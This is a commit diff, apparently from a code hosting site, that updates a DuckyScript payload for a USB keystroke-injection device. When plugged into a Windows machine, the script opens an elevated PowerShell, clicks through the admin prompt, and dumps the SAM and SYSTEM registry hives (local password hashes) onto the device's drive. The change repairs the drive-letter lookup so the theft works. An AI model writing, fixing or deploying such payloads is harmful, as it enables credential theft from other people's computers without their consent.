Compare commits

...

2 Commits

Author SHA1 Message Date
Mavis Coffey 5036fd1b9f
Merge 61eb88ab6c into 675972662a 2024-10-22 14:42:24 -04:00
Mavis Coffey 61eb88ab6c
Update payload.txt 2024-10-22 14:41:32 -04:00
1 changed files with 10 additions and 6 deletions

View File

@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_IF
END_REM
END_EXTENSION
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN
INJECT_MOD GUI R
GUI r
DELAY 500
STRING cmd
STRING powershell
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL D:
STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DELAY 250
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system #DRIVELABEL/system.save
STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE
ATTACKMODE OFF
STOP_PAYLOAD
END_IF